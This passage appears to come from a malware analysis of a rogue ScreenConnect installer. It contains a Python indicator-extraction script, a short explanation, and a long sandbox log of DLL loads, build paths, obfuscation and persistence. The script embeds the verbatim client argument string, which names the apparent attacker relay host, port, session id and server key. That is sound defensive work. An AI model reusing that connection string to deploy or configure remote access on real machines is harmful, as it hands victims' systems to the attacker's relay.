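# Constructed input: the argument string handed to ScreenConnect.ClientService.exe in the
# process list above, copied verbatim with the surrounding double quotes removed.
CLIENT_ARGS = (
    "?e=Access&y=Guest&h=sc.connectprotocol.es&p=8041&s=5b6ef70d-09c3-4123-8987-219271e6483f"
    "&k=BgIAAACkAABSU0ExAAgAAAEAAQC1kWKbpg72shug%2fcuGWQB7IuEBcyNy1kcDtCeo3N0RY4axIPh%2fFMztLn0b%2bG2MIuQOrKGq0Xsvxj7WUcZ%2bdIiMwDt7qlLgFko33osOQisFILKOBROsqmoO0CYg%2fpKva7AaAU%2bym8ZeY9OkPYj7knkvh679kRKgwWM5tfC%2fbhzztt1d5pfIewfVI67rLcAGqXh1hUDy%2bbdI6LG6r8m8lQczrbhXAZJ%2fuvXvUGXN6ZWttC7E00yJiy6fPWNioX5EJ%2fn2uX9gCWU%2bpspAIXXJhOyEHV84BHAUT0rgC1re8M9Puttx9uDjI37OpBOLw%2f5qq735uizmWAgUfhfj%2fLZeRyvQ"
    "&t=GOLDEN-TEAM-001"
)

PUBLICKEYBLOB = 0x06        # BLOBHEADER.bType for a CryptoAPI public key blob
CALG_RSA_KEYX = 0x0000A400  # BLOBHEADER.aiKeyAlg for an RSA key-exchange key
CALG_RSA_SIGN = 0x00002400  # ... and for an RSA signature key


def parse_client_args(args):
    """Split the client argument string into {name: [values]}.

    Values are %-decoded with unquote, not unquote_plus: the 'k' value is base64, where
    '+' is a data character, so it must not be turned into a space. Repeated names keep
    every value, in order.
    """
    query = args[1:] if args.startswith("?") else args
    params = {}
    for field in query.split("&"):
        if not field:
            continue
        name, _, value = field.partition("=")
        params.setdefault(name, []).append(unquote(value))
    return params


def parse_publickeyblob(b64):
    """Decode a base64 CryptoAPI PUBLICKEYBLOB.

    Layout: BLOBHEADER (bType, bVersion, reserved, aiKeyAlg; 8 bytes), RSAPUBKEY
    (magic 'RSA1', bit length, public exponent; 12 bytes), then the modulus in
    little-endian byte order, bit_length / 8 bytes long.
    """
    blob = base64.b64decode(b64 + "=" * (-len(b64) % 4))  # tolerate stripped padding
    if len(blob) < 20:
        raise ValueError("blob shorter than BLOBHEADER + RSAPUBKEY")
    blob_type, version, _reserved, alg_id = struct.unpack_from("<BBHI", blob, 0)
    magic, bit_length, public_exponent = struct.unpack_from("<4sII", blob, 8)
    if blob_type != PUBLICKEYBLOB or magic != b"RSA1":
        raise ValueError("not an RSA PUBLICKEYBLOB")
    if alg_id not in (CALG_RSA_KEYX, CALG_RSA_SIGN):
        raise ValueError(f"unexpected ALG_ID 0x{alg_id:08x}")
    modulus_bytes = blob[20:20 + bit_length // 8]
    if len(modulus_bytes) != bit_length // 8:
        raise ValueError("modulus truncated")
    return {
        "blob_type": blob_type,
        "version": version,
        "alg_id": alg_id,
        "bit_length": bit_length,
        "public_exponent": public_exponent,
        "modulus": int.from_bytes(modulus_bytes, "little"),
        # Hash of the whole blob: a fingerprint of the server's key that survives
        # changes of relay host, port or label between installers.
        "sha256": hashlib.sha256(blob).hexdigest(),
    }


def extract_iocs(args):
    """Return the network and identity indicators a responder would pivot on."""
    params = parse_client_args(args)

    def first(name):
        return params.get(name, [None])[0]

    iocs = {
        "session_type": first("e"),   # assumed meaning: e = session type
        "role": first("y"),           # assumed meaning: y = client role
        "relay_host": first("h"),     # assumed meaning: h = relay/server host
        "relay_port": int(first("p")) if first("p") else None,  # assumed: p = port
        "session_id": first("s"),     # assumed meaning: s = session id
        "label": first("t"),          # assumed meaning: t = operator-chosen label
    }
    if first("k"):                    # assumed meaning: k = server public key blob
        key = parse_publickeyblob(first("k"))
        iocs["server_key_bits"] = key["bit_length"]
        iocs["server_key_exponent"] = key["public_exponent"]
        iocs["server_key_sha256"] = key["sha256"]
    return iocs


if __name__ == "__main__":
    for name, value in extract_iocs(CLIENT_ARGS).items():
        print(f"{name:20} {value}")
```

Two details matter in practice: decode with unquote rather than unquote_plus (a "+" inside the blob is data, and the original is encoded as %2b for exactly that reason), and treat t as untrusted operator text, useful as a pivot string and nothing more. The rundll32 line in the same process list, with its zzzzInvokeManagedCustomActionOutOfProc export, is the WiX Deployment Tools Foundation out-of-process host (SfxCA) for the MSI's managed custom action; by itself it is expected installer behaviour rather than code injection.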
Source: C:\Users\user\Desktop\f53WqfzzNt.exe | Sections loaded (in order): apphelp.dll, mscoree.dll, kernel.appcore.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, wldp.dll, amsi.dll, userenv.dll, profapi.dll, version.dll, msasn1.dll, gpapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, uxtheme.dll, windows.storage.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Sections loaded (in order): apphelp.dll, aclayers.dll, mpr.dll, sfc.dll, sfc_os.dll, msi.dll, srpapi.dll, kernel.appcore.dll, kernel.appcore.dll, tsappcmp.dll, uxtheme.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, coremessaging.dll, wintypes.dll, wintypes.dll, wintypes.dll, windows.storage.dll, wldp.dll, propsys.dll, textshaping.dll, netapi32.dll, wkscli.dll, netutils.dll, version.dll, mscoree.dll, profapi.dll, sspicli.dll, msihnd.dll, pcacli.dll
Source: C:\Windows\System32\msiexec.exe | Sections loaded (in order): apphelp.dll, aclayers.dll, sfc.dll, sfc_os.dll, kernel.appcore.dll, msi.dll, tsappcmp.dll, userenv.dll, profapi.dll, sspicli.dll, netapi32.dll, wkscli.dll, netutils.dll, srclient.dll, spp.dll, powrprof.dll, vssapi.dll, vsstrace.dll, umpdc.dll, wldp.dll, mscoree.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, rstrtmgr.dll, ncrypt.dll, ntasn1.dll, windows.storage.dll, pcacli.dll, mpr.dll, cabinet.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Sections loaded (in order): apphelp.dll, aclayers.dll, mpr.dll, sfc.dll, sfc_os.dll, kernel.appcore.dll, msi.dll, cabinet.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Sections loaded (in order): apphelp.dll, aclayers.dll, mpr.dll, sfc.dll, sfc_os.dll, kernel.appcore.dll, msi.dll, version.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Sections loaded (in order): apphelp.dll, aclayers.dll, mpr.dll, sfc.dll, sfc_os.dll, kernel.appcore.dll, msi.dll, version.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe | Sections loaded (in order): apphelp.dll, mscoree.dll, kernel.appcore.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, sspicli.dll, windows.storage.dll, wldp.dll, propsys.dll, version.dll, profapi.dll, dpapi.dll, amsi.dll, userenv.dll, msasn1.dll, gpapi.dll, wtsapi32.dll, winsta.dll, mswsock.dll, dnsapi.dll, iphlpapi.dll, rasadhlp.dll, netapi32.dll, samcli.dll, samlib.dll, fwpuclnt.dll, dhcpcsvc6.dll, dhcpcsvc.dll, winnsi.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Sections loaded (in order): mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, profapi.dll, amsi.dll, userenv.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, sspicli.dll, propsys.dll, windowscodecs.dll, dwrite.dll
Source: C:\Windows\System32\svchost.exe | Sections loaded (in order): kernel.appcore.dll, qmgr.dll, bitsperf.dll, powrprof.dll, xmllite.dll, firewallapi.dll, esent.dll, umpdc.dll, dnsapi.dll, iphlpapi.dll, fwbase.dll, wldp.dll, ntmarta.dll, profapi.dll, flightsettings.dll, policymanager.dll, msvcp110_win.dll, netprofm.dll, npmproxy.dll, bitsigd.dll, upnp.dll, winhttp.dll, ssdpapi.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, appxdeploymentclient.dll, cryptbase.dll, wsmauto.dll, miutils.dll, wsmsvc.dll, dsrole.dll, pcwum.dll, mi.dll, userenv.dll, gpapi.dll, wkscli.dll, sspicli.dll
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Section loaded: mscoree.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Section loaded: version.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Section loaded: wldp.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Section loaded: profapi.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Section loaded: amsi.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Section loaded: userenv.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Section loaded: urlmon.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Section loaded: iertutil.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Section loaded: srvcli.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Section loaded: netutils.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Section loaded: sspicli.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Section loaded: propsys.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Section loaded: windowscodecs.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Section loaded: wtsapi32.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Section loaded: winsta.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Section loaded: wbemcomn.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Section loaded: netapi32.dll
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Section loaded: wkscli.dll
Source: C:\Users\user\Desktop\f53WqfzzNt.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\f53WqfzzNt.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: f53WqfzzNt.exe | Static PE information: certificate valid
Source: f53WqfzzNt.exe | Static file information: File size 5620624 > 1048576
Source: f53WqfzzNt.exe | Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x533200
Source: f53WqfzzNt.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: f53WqfzzNt.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: f53WqfzzNt.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: f53WqfzzNt.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: f53WqfzzNt.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: f53WqfzzNt.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: f53WqfzzNt.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: f53WqfzzNt.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.2.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbM source: f53WqfzzNt.exe
Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: f53WqfzzNt.exe
Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: f53WqfzzNt.exe
Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.4.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.2.dr
Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller.Package\Microsoft.Deployment.WindowsInstaller.Package.pdb source: Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr
Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000007.00000002.3589517953.00000000024F7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1835897049.0000000012350000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: f53WqfzzNt.exe, ScreenConnect.Core.dll.4.dr, ScreenConnect.Core.dll.2.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3574448875.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1829810694.0000000002312000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1829941114.0000000002341000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1829695484.00000000022D0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.2.dr
Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: f53WqfzzNt.exe
Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000007.00000000.1769116462.0000000000C0D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.2.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: f53WqfzzNt.exe, ScreenConnect.Windows.dll.2.dr, ScreenConnect.Windows.dll.4.dr
Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000004.00000003.1742512877.0000000004430000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1736264146.00000000045AA000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.4.dr
Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.4.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\net20\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.4.dr
Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000004.00000003.1736264146.000000000453B000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.4.dr
Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: f53WqfzzNt.exe, 4ec961.msi.2.dr, MSICBE0.tmp.2.dr, MSICFCA.tmp.2.dr, 4ec95f.msi.2.dr, MSICBF0.tmp.2.dr, ScreenConnect.ClientSetup.msi.0.dr, 4ec960.rbs.2.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbS] source: f53WqfzzNt.exe, ScreenConnect.Windows.dll.2.dr, ScreenConnect.Windows.dll.4.dr
Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000007.00000002.3589517953.00000000024F7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1835897049.0000000012350000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.2.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1778391029.0000000000E62000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.dr
Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: f53WqfzzNt.exe, 4ec961.msi.2.dr, MSIC2F6.tmp.1.dr, 4ec95f.msi.2.dr, ScreenConnect.ClientSetup.msi.0.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbu source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1778391029.0000000000E62000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbi source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1837827239.000000001AD32000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1837827239.000000001AD32000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr
Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000007.00000002.3589517953.00000000024F7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1835897049.0000000012350000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.2.dr
Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: f53WqfzzNt.exe
Source: f53WqfzzNt.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: f53WqfzzNt.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: f53WqfzzNt.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: f53WqfzzNt.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: f53WqfzzNt.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Source: 0.0.f53WqfzzNt.exe.14578ec.1.raw.unpack, Program.cs | .Net Code: Main System.Reflection.Assembly.Load(byte[])
Source: 0.2.f53WqfzzNt.exe.1720000.0.raw.unpack, Program.cs | .Net Code: Main System.Reflection.Assembly.Load(byte[])
Source: f53WqfzzNt.exe | Static PE information: real checksum: 0x54d1c1 should be: 0x55ee26
Source: C:\Users\user\Desktop\f53WqfzzNt.exe | Code function: 0_2_016B70B0 push eax; mov dword ptr [esp], ecx | 0_2_016B70C1
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe | Code function: 7_2_0399CE68 push ebx; ret | 7_2_0399CE92
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe | Code function: 7_2_0399F22B pushfd ; ret | 7_2_0399F249
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe | Code function: 7_2_0399D043 pushad ; ret | 7_2_0399D052
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe | Code function: 7_2_052142D1 push esp; ret | 7_2_052142E3
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe | Code function: 7_2_0522369B push ebx; iretd | 7_2_052236DA
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe | Code function: 7_2_0522BCF0 push eax; retf | 7_2_0522BCF1
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Code function: 8_2_00007FFD9B3022ED push ebx; retf | 8_2_00007FFD9B3022FA
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Code function: 8_2_00007FFD9B30096D push ebx; retf | 8_2_00007FFD9B30098A
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Code function: 8_2_00007FFD9B3008CD push ebx; retf | 8_2_00007FFD9B30098A
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Code function: 8_2_00007FFD9B60792B push ebx; retf | 8_2_00007FFD9B60796A
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Code function: 8_2_00007FFD9B607928 push ebx; retf | 8_2_00007FFD9B60796A
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Code function: 8_2_00007FFD9B608D84 push es; iretd | 8_2_00007FFD9B608D85
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Code function: 8_2_00007FFD9B6055E1 push es; iretd | 8_2_00007FFD9B605627
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Code function: 10_2_00007FFD9B2F23CD push ebx; iretd | 10_2_00007FFD9B2F240A
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Code function: 10_2_00007FFD9B2F22ED push ebx; retf | 10_2_00007FFD9B2F22FA
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Code function: 10_2_00007FFD9B2F096D push ebx; retf | 10_2_00007FFD9B2F098A
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Code function: 10_2_00007FFD9B2F08CD push ebx; retf | 10_2_00007FFD9B2F098A
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Code function: 10_2_00007FFD9B2E3750 push eax; retf | 10_2_00007FFD9B2E381D
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Code function: 10_2_00007FFD9B5F2F12 pushfd ; iretd | 10_2_00007FFD9B5F2F13

Persistence and Installation Behavior

Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log
Source: c:\program files (x86)\screenconnect client (a532d472f1ff1d4e)\screenconnect.windowscredentialprovider.dll | COM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-66e1-82ebbd1a2a17}\inprocserver32
